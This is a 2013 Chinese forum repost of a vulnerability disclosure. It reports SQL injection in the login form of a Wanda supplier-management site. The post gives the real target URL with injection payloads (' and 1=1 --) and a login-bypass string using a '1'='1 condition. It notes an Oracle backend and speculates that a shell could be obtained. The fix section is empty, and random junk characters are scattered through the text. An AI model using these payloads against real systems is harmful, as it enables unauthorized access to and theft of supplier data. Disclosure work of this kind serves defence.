找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2804|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。: t* K' L- G* l; |' Q% a$ _
详细说明:
; Y) ]9 m5 {  s2 a4 A$ c万达scm系统登陆框sql注入。% m& Z' L3 [2 K  D$ @

* k7 R) p3 u/ L. [http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
1 Q0 m* Q' |6 b" l3 K" n" s$ f/ `+ E  i/ l) R/ m# N2 h) P

* u$ o& h- ~5 ^, V. ?, V  h500错误。
. z1 O8 T/ V1 @; s3 e' y. f4 i8 S7 X. {8 v
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
  l1 ^5 ?  X1 {0 i1 ohttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
: c+ x1 K5 t: ~2 f截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
& }) y! N9 @$ P2 n经过分析,登陆验证的过程应该是:' o* l9 F1 V; z7 K. Y5 _
0 @$ d( t. N8 M4 \( r+ @/ h
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。0 b/ H$ ]* ~& q
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
  _8 b0 H; e! c
  `* R0 E  X& [" p; ]' B+ m/ e/ N3 toracle数据库,存在注入点。@大连万达,你怎么看?
, U9 u3 Y6 y" W; H% i. N5 rhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png$ O$ F! w' C, @& b
" |! i! x4 [% y4 C
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。7 z) B) p; z: t) i: ^
漏洞证明:5 u- _0 V0 t( N6 N4 h
万达scm系统登陆框sql注入。1 f1 X/ q. h) E# \; o' i; K

& J3 Z: Q; N0 Q( q; W; y# B6 khttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
7 @8 m7 }1 P  j) U  }0 g5 g$ _  @

' K# Q) ^0 N! I: V1 B. B, O500错误。2 A. u: _& m; N) C1 O

# e( ^7 u/ X0 ~/ [! N3 n4 M+ K用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
" X: K0 C, f" l: ~% [3 ]  uhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png5 l6 g  {7 o$ M$ ]# ?9 p

4 e+ z# |7 A" m: z$ c' v$ e7 D* ^' H2 e2 r8 _& ~% {5 [; e( V. A
(截图有一点问题), Y5 f) F+ {( v; r
" I6 |% j+ u( @0 \) y. T/ R+ j; P
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
  B: u0 P& @6 W1 }& A( `0 q9 T* R+ A9 W! M" a) _3 q
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。- t1 S3 A" m& X

) S; k; p7 t* x: |绕过:
  i! P% j' x& O( Q9 u! Dhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1( `0 ^4 w; f6 {/ Q4 o  h% F$ {% r6 l
. G4 z0 K. a# K6 V5 Z) M5 N! J0 y
$ p  K7 a$ C+ m+ ]% `) ?
oracle数据库,存在注入点。@大连万达,你怎么看?
% r" v3 P  H( h7 g# b/ C8 h​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
( q( d6 b2 `( I1 s" a' H3 _6 F
修复方案:
; l8 \9 F) }2 R! ?。。。
' x5 f1 Z# V' w, W; b* ]2 O7 t) y. Y, x

& ^; f' w& \9 b; G厂商已经确认& R; e# k8 M  [$ }; K1 X/ K
+ f  g( T% a+ e0 U
[/td][/tr]  G. Q9 d- L7 y( v
[/table]
( T) U3 o% r/ f4 K' z
  e7 }7 C* u7 b& b) u* u( H# r% `6 h0 |% K! W; z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表